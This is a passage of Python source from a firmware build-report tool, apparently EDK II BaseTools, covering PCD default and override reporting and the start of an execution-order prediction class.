for Key in sorted(AllPcdDict):
#
# Group PCD by their token space GUID C Name
#
First = True
for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
#
# Group PCD by their usage type
#
Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
MixedPcdFlag = False
if GlobalData.MixedPcd:
for PcdKey in GlobalData.MixedPcd:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
PcdTokenCName = PcdKey[0]
MixedPcdFlag = True
if MixedPcdFlag and not ModulePcdSet:
continue
#
# Get PCD default value and their override relationship
#
DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
DscDefaultValBak = DscDefaultValue
Field = ''
for (CName, Guid, Field) in self.FdfPcdSet:
if CName == PcdTokenCName and Guid == Key:
DscDefaultValue = self.FdfPcdSet[(CName, Guid, Field)]
break
if DscDefaultValue != DscDefaultValBak:
try:
DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as DscDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
InfDefaultValue = None
PcdValue = DecDefaultValue
if DscDefaultValue:
PcdValue = DscDefaultValue
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if ModulePcdSet is not None:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
continue
InfDefaultValue, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if InfDefaultValue:
try:
InfDefaultValue = ValueExpressionEx(InfDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as InfDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" % (InfDefaultValue, Pcd.DatumType))
if InfDefaultValue == "":
InfDefaultValue = None
BuildOptionMatch = False
if GlobalData.BuildOptionPcd:
for pcd in GlobalData.BuildOptionPcd:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
if pcd[2]:
continue
PcdValue = pcd[3]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
BuildOptionMatch = True
break
if First:
if ModulePcdSet is None:
FileWrite(File, "")
FileWrite(File, Key)
First = False
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
try:
PcdValueNumber = int(PcdValue.strip(), 0)
except:
PcdValueNumber = int(PcdValue.lstrip('0'))
if DecDefaultValue is None:
DecMatch = True
else:
DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
DecMatch = (DecDefaultValueNumber == PcdValueNumber)
if InfDefaultValue is None:
InfMatch = True
else:
InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
InfMatch = (InfDefaultValueNumber == PcdValueNumber)
if DscDefaultValue is None:
DscMatch = True
else:
try:
DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
except:
DscDefaultValueNumber = int(DscDefaultValue.lstrip('0'))
DscMatch = (DscDefaultValueNumber == PcdValueNumber)
else:
if DecDefaultValue is None:
DecMatch = True
else:
DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
if InfDefaultValue is None:
InfMatch = True
else:
InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
if DscDefaultValue is None:
DscMatch = True
else:
DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
IsStructure = False
if self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
IsStructure = True
if TypeName in ('DYNVPD', 'DEXVPD'):
SkuInfoList = Pcd.SkuInfoList
Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
Pcd.DatumType = Pcd.StructName
if TypeName in ('DYNVPD', 'DEXVPD'):
Pcd.SkuInfoList = SkuInfoList
if Pcd.PcdFieldValueFromComm:
BuildOptionMatch = True
DecMatch = False
elif Pcd.SkuOverrideValues:
DscOverride = False
if Pcd.DefaultFromDSC:
DscOverride = True
else:
DictLen = 0
for item in Pcd.SkuOverrideValues:
DictLen += len(Pcd.SkuOverrideValues[item])
if not DictLen:
DscOverride = False
else:
if not Pcd.SkuInfoList:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
Keys = list(OverrideValues.keys())
Data = OverrideValues[Keys[0]]
Struct = list(Data.values())
DscOverride = self.ParseStruct(Struct[0])
else:
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
OverrideValues = Pcd.SkuOverrideValues[Sku]
DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
if DscOverride:
break
else:
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = list(OverrideValues.keys())
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
DscOverride = self.ParseStruct(OverrideFieldStruct)
if DscOverride:
break
if DscOverride:
DscDefaultValue = True
DscMatch = True
DecMatch = False
else:
DecMatch = True
else:
DscDefaultValue = True
DscMatch = True
DecMatch = False
#
# Report PCD item according to their override relationship
#
if Pcd.DatumType == 'BOOLEAN':
if DscDefaultValue:
DscDefaultValue = str(int(DscDefaultValue, 0))
if DecDefaultValue:
DecDefaultValue = str(int(DecDefaultValue, 0))
if InfDefaultValue:
InfDefaultValue = str(int(InfDefaultValue, 0))
if Pcd.DefaultValue:
Pcd.DefaultValue = str(int(Pcd.DefaultValue, 0))
if DecMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
elif InfDefaultValue and InfMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
elif BuildOptionMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
else:
if DscDefaultValue and DscMatch:
if (Pcd.TokenCName, Key, Field) in self.FdfPcdSet:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
if ModulePcdSet is None:
if IsStructure:
continue
if not TypeName in ('PATCH', 'FLAG', 'FIXED'):
continue
if not BuildOptionMatch:
ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
for ModulePath in ModuleOverride:
ModuleDefault = ModuleOverride[ModulePath]
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
try:
ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
except:
ModulePcdDefaultValueNumber = int(ModuleDefault.lstrip('0'))
Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
if Pcd.DatumType == 'BOOLEAN':
ModuleDefault = str(ModulePcdDefaultValueNumber)
else:
Match = (ModuleDefault.strip() == PcdValue.strip())
if Match:
continue
IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
if IsByteArray:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
Value = ModuleDefault.strip()
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, Value))
if ModulePcdSet is None:
FileWrite(File, gSectionEnd)
else:
if not ReportSubType and ModulePcdSet:
FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
HasDscOverride = False
if struct:
for _, Values in struct.items():
if Values[1] and Values[1].endswith('.dsc'):
HasDscOverride = True
break
return HasDscOverride
    def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
        """Append the DSC / INF / DEC default values of *Pcd* to the report.

        A default is printed only when it differs from the effective value
        (the corresponding *Match flag is False) and is not None.  Byte-array
        values are expanded one array line at a time; clean numeric values are
        shown in both hex and decimal form.  For structure PCDs the per-field
        breakdown of Pcd.DefaultValues is appended as well.
        """
        if not DscMatch and DscDefaultValue is not None:
            Value = DscDefaultValue.strip()
            IsByteArray, ArrayList = ByteArrayForamt(Value)
            if IsByteArray:
                FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
                for Array in ArrayList:
                    FileWrite(File, Array)
            else:
                if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                    # Show the value in both hex and decimal notation.
                    if Value.startswith(('0x', '0X')):
                        Value = '{} ({:d})'.format(Value, int(Value, 0))
                    else:
                        Value = "0x{:X} ({})".format(int(Value, 0), Value)
                FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
        if not InfMatch and InfDefaultValue is not None:
            Value = InfDefaultValue.strip()
            IsByteArray, ArrayList = ByteArrayForamt(Value)
            if IsByteArray:
                FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
                for Array in ArrayList:
                    FileWrite(File, Array)
            else:
                if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                    if Value.startswith(('0x', '0X')):
                        Value = '{} ({:d})'.format(Value, int(Value, 0))
                    else:
                        Value = "0x{:X} ({})".format(int(Value, 0), Value)
                FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
        if not DecMatch and DecDefaultValue is not None:
            Value = DecDefaultValue.strip()
            IsByteArray, ArrayList = ByteArrayForamt(Value)
            if IsByteArray:
                FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
                for Array in ArrayList:
                    FileWrite(File, Array)
            else:
                if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                    if Value.startswith(('0x', '0X')):
                        Value = '{} ({:d})'.format(Value, int(Value, 0))
                    else:
                        try:
                            Value = "0x{:X} ({})".format(int(Value, 0), Value)
                        except:
                            # Fallback for values int(x, 0) cannot parse, e.g.
                            # decimal strings with leading zeros.
                            # NOTE(review): this still raises if the stripped
                            # string is non-numeric — confirm inputs upstream.
                            Value = "0x{:X} ({})".format(int(Value.lstrip('0')), Value)
                FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
            if IsStructure:
                self.PrintStructureInfo(File, Pcd.DefaultValues)
        if DecMatch and IsStructure:
            self.PrintStructureInfo(File, Pcd.DefaultValues)
    def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '):
        """Write the effective value of one PCD to the report file.

        For PCDs without SKU information a single value line is written.
        Otherwise one line is emitted per SKU — and, for HII PCDs
        (TypeName 'DYNHII'/'DEXHII'), per default store — with the token name
        and *Flag* only on the first printed line.  Structure PCDs get a
        per-field breakdown, and the DSC/INF/DEC defaults are appended via
        PrintPcdDefault.
        """
        if not Pcd.SkuInfoList:
            Value = Pcd.DefaultValue
            IsByteArray, ArrayList = ByteArrayForamt(Value)
            if IsByteArray:
                FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
                for Array in ArrayList:
                    FileWrite(File, Array)
            else:
                if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                    # Show clean numeric values in both hex and decimal form.
                    if Value.startswith(('0x', '0X')):
                        Value = '{} ({:d})'.format(Value, int(Value, 0))
                    else:
                        Value = "0x{:X} ({})".format(int(Value, 0), Value)
                FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
            if IsStructure:
                # Only the first SKU's field table is shown — there is no SKU
                # list for this PCD.
                OverrideValues = Pcd.SkuOverrideValues
                if OverrideValues:
                    Keys = list(OverrideValues.keys())
                    Data = OverrideValues[Keys[0]]
                    Struct = list(Data.values())
                    if Struct:
                        OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct[0])
                        self.PrintStructureInfo(File, OverrideFieldStruct)
            self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
        else:
            # FirstPrint controls whether the token name / Flag column is
            # printed (first line) or left blank (continuation lines).
            FirstPrint = True
            SkuList = sorted(Pcd.SkuInfoList.keys())
            for Sku in SkuList:
                SkuInfo = Pcd.SkuInfoList[Sku]
                SkuIdName = SkuInfo.SkuIdName
                if TypeName in ('DYNHII', 'DEXHII'):
                    # HII PCD: one line per (SKU, default store) pair, plus the
                    # variable GUID/name/offset on a trailing line.
                    if SkuInfo.DefaultStoreDict:
                        DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
                        for DefaultStore in DefaultStoreList:
                            Value = SkuInfo.DefaultStoreDict[DefaultStore]
                            IsByteArray, ArrayList = ByteArrayForamt(Value)
                            if Pcd.DatumType == 'BOOLEAN':
                                Value = str(int(Value, 0))
                            if FirstPrint:
                                FirstPrint = False
                                if IsByteArray:
                                    if self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
                                    elif self.DefaultStoreSingle and not self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
                                    elif not self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
                                    else:
                                        FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
                                    for Array in ArrayList:
                                        FileWrite(File, Array)
                                else:
                                    if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                                        if Value.startswith(('0x', '0X')):
                                            Value = '{} ({:d})'.format(Value, int(Value, 0))
                                        else:
                                            Value = "0x{:X} ({})".format(int(Value, 0), Value)
                                    if self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
                                    elif self.DefaultStoreSingle and not self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
                                    elif not self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
                                    else:
                                        FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
                            else:
                                # Continuation line: blank token-name column.
                                if IsByteArray:
                                    if self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
                                    elif self.DefaultStoreSingle and not self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
                                    elif not self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
                                    else:
                                        FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
                                    for Array in ArrayList:
                                        FileWrite(File, Array)
                                else:
                                    if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                                        if Value.startswith(('0x', '0X')):
                                            Value = '{} ({:d})'.format(Value, int(Value, 0))
                                        else:
                                            Value = "0x{:X} ({})".format(int(Value, 0), Value)
                                    if self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
                                    elif self.DefaultStoreSingle and not self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
                                    elif not self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
                                    else:
                                        FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
                            FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
                            if IsStructure:
                                OverrideValues = Pcd.SkuOverrideValues[Sku]
                                OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
                                self.PrintStructureInfo(File, OverrideFieldStruct)
                            self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
                else:
                    # Non-HII SKU-aware PCD: one line per SKU; VPD PCDs also
                    # print their VPD offset on a trailing line.
                    Value = SkuInfo.DefaultValue
                    IsByteArray, ArrayList = ByteArrayForamt(Value)
                    if Pcd.DatumType == 'BOOLEAN':
                        Value = str(int(Value, 0))
                    if FirstPrint:
                        FirstPrint = False
                        if IsByteArray:
                            if self.SkuSingle:
                                FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
                            else:
                                FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
                            for Array in ArrayList:
                                FileWrite(File, Array)
                        else:
                            if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                                if Value.startswith(('0x', '0X')):
                                    Value = '{} ({:d})'.format(Value, int(Value, 0))
                                else:
                                    Value = "0x{:X} ({})".format(int(Value, 0), Value)
                            if self.SkuSingle:
                                FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
                            else:
                                FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
                    else:
                        if IsByteArray:
                            if self.SkuSingle:
                                FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', "{"))
                            else:
                                FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
                            for Array in ArrayList:
                                FileWrite(File, Array)
                        else:
                            if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                                if Value.startswith(('0x', '0X')):
                                    Value = '{} ({:d})'.format(Value, int(Value, 0))
                                else:
                                    Value = "0x{:X} ({})".format(int(Value, 0), Value)
                            if self.SkuSingle:
                                FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
                            else:
                                FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
                    if TypeName in ('DYNVPD', 'DEXVPD'):
                        FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
                    if IsStructure:
                        OverrideValues = Pcd.SkuOverrideValues[Sku]
                        if OverrideValues:
                            Keys = list(OverrideValues.keys())
                            OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
                            self.PrintStructureInfo(File, OverrideFieldStruct)
                    self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
OverrideFieldStruct = collections.OrderedDict()
if OverrideStruct:
for Key, Values in OverrideStruct.items():
if Values[1] and Values[1].endswith('.dsc'):
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromFdf:
for Key, Values in Pcd.PcdFieldValueFromFdf.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromComm:
for Key, Values in Pcd.PcdFieldValueFromComm.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
return OverrideFieldStruct
def PrintStructureInfo(self, File, Struct):
for Key, Value in sorted(Struct.items(), key=lambda x: x[0]):
if Value[1] and 'build command options' in Value[1]:
FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
elif Value[1] and Value[1].endswith('.fdf'):
FileWrite(File, ' *F %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
else:
FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
def StrtoHex(self, value):
try:
value = hex(int(value))
return value
except:
if value.startswith("L\"") and value.endswith("\""):
valuelist = []
for ch in value[2:-1]:
valuelist.append(hex(ord(ch)))
valuelist.append('0x00')
return valuelist
elif value.startswith("\"") and value.endswith("\""):
return hex(ord(value[1:-1]))
elif value.startswith("{") and value.endswith("}"):
valuelist = []
if ',' not in value:
return value[1:-1]
for ch in value[1:-1].split(','):
ch = ch.strip()
if ch.startswith('0x') or ch.startswith('0X'):
valuelist.append(ch)
continue
try:
valuelist.append(hex(int(ch.strip())))
except:
pass
return valuelist
else:
return value
def IsStructurePcd(self, PcdToken, PcdTokenSpaceGuid):
if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd) and ((PcdToken, PcdTokenSpaceGuid) in GlobalData.gStructurePcd[self.Arch]):
return True
else:
return False
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
    """Generates the execution-order and fixed-address prediction sections of
    the build report, driven by the EOT tool and the platform map file."""
    ##
    # Constructor function for class PredictionReport
    #
    # This constructor function generates PredictionReport object for the platform.
    #
    # @param self:           The object pointer
    # @param Wa              Workspace context information
    #
    def __init__(self, Wa):
        self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
        self._MapFileParsed = False
        self._EotToolInvoked = False
        self._FvDir = Wa.FvDir
        self._EotDir = Wa.BuildDir
        self._FfsEntryPoint = {}
        self._GuidMap = {}
        self._SourceList = []
        self.FixedMapDict = {}
        self.ItemList = []
        self.MaxLen = 0
        #
        # Collect all platform reference source files and GUID C Name
        #
        for Pa in Wa.AutoGenObjectList:
            for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
                #
                # BASE typed modules are EFI agnostic, so we need not scan
                # their source code to find PPI/Protocol produce or consume
                # information.
                #
                if Module.ModuleType == SUP_MODULE_BASE:
                    continue
                #
                # Add module referenced source files
                #
                self._SourceList.append(str(Module))
                IncludeList = {}
                for Source in Module.SourceFileList:
                    if os.path.splitext(str(Source))[1].lower() == ".c":
                        self._SourceList.append(" " + str(Source))
                        FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
                for IncludeFile in IncludeList.values():
                    self._SourceList.append(" " + IncludeFile)
                # Map GUID C names to their registry-format GUID strings for
                # every PPI, protocol and GUID the module declares.
                for Guid in Module.PpiList:
                    self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
                for Guid in Module.ProtocolList:
                    self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
                for Guid in Module.GuidList:
                    self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])
                if Module.Guid and not Module.IsLibrary:
                    EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
                    # AutoGen spec >= 1.5: modules link against the glue
                    # library whose real entry symbol is _ModuleEntryPoint.
                    if int(str(Module.AutoGenVersion), 0) >= 0x00010005:
                        RealEntryPoint = "_ModuleEntryPoint"
                    else:
                        RealEntryPoint = EntryPoint
                        if EntryPoint == "_ModuleEntryPoint":
                            # Recover the INF entry point name from the glue
                            # library define in the CC flags.
                            CCFlags = Module.BuildOption.get("CC", {}).get("FLAGS", "")
                            Match = gGlueLibEntryPoint.search(CCFlags)
                            if Match:
                                EntryPoint = Match.group(1)
                    self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)
        #
        # Collect platform firmware volume list as the input of EOT.
        #
        self._FvList = []
        if Wa.FdfProfile:
            for Fd in Wa.FdfProfile.FdDict:
                for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
                    if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
                        continue
                    for FvName in FdRegion.RegionDataList:
                        if FvName in self._FvList:
                            continue
                        self._FvList.append(FvName)
                        for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
                            for Section in Ffs.SectionList:
                                try:
                                    # Only FV-image sections have SectionList /
                                    # FvName; others raise AttributeError.
                                    for FvSection in Section.SectionList:
                                        if FvSection.FvName in self._FvList:
                                            continue
                                        self._FvList.append(FvSection.FvName)
                                except AttributeError:
                                    pass
    ##
    # Parse platform fixed address map files
    #
    # This function parses the platform final fixed address map file to get
    # the database of predicted fixed address for module image base, entry point
    # etc.
    #
    # @param self:           The object pointer
    #
    def _ParseMapFile(self):
        # Parse at most once per report instance.
        if self._MapFileParsed:
            return
        self._MapFileParsed = True
        if os.path.isfile(self._MapFileName):
            try:
                FileContents = open(self._MapFileName).read()
                for Match in gMapFileItemPattern.finditer(FileContents):
                    AddressType = Match.group(1)
                    BaseAddress = Match.group(2)
                    EntryPoint = Match.group(3)
                    Guid = Match.group(4).upper()
                    List = self.FixedMapDict.setdefault(Guid, [])
                    # '*I' marks the image base, '*E' the entry point.
                    List.append((AddressType, BaseAddress, "*I"))
                    List.append((AddressType, EntryPoint, "*E"))
            except:
                EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
    ##
    # Invokes EOT tool to get the predicted the execution order.
    #
    # This function invokes EOT tool to calculate the predicted dispatch order
    #
    # @param self:           The object pointer
    #
    def _InvokeEotTool(self):
        # Invoke at most once per report instance.
        if self._EotToolInvoked:
            return
        self._EotToolInvoked = True
        FvFileList = []
        for FvName in self._FvList:
            FvFile = os.path.join(self._FvDir, FvName + ".Fv")
            if os.path.isfile(FvFile):
                FvFileList.append(FvFile)
        if len(FvFileList) == 0:
            return
        #
        # Write source file list and GUID file list to an intermediate file
        # as the input for EOT tool and dispatch List as the output file
        # from EOT tool.
        #
        SourceList = os.path.join(self._EotDir, "SourceFile.txt")
        GuidList = os.path.join(self._EotDir, "GuidList.txt")
        DispatchList = os.path.join(self._EotDir, "Dispatch.txt")
        TempFile = open(SourceList, "w+")
        for Item in self._SourceList:
            FileWrite(TempFile, Item)
        TempFile.close()
        TempFile = open(GuidList, "w+")
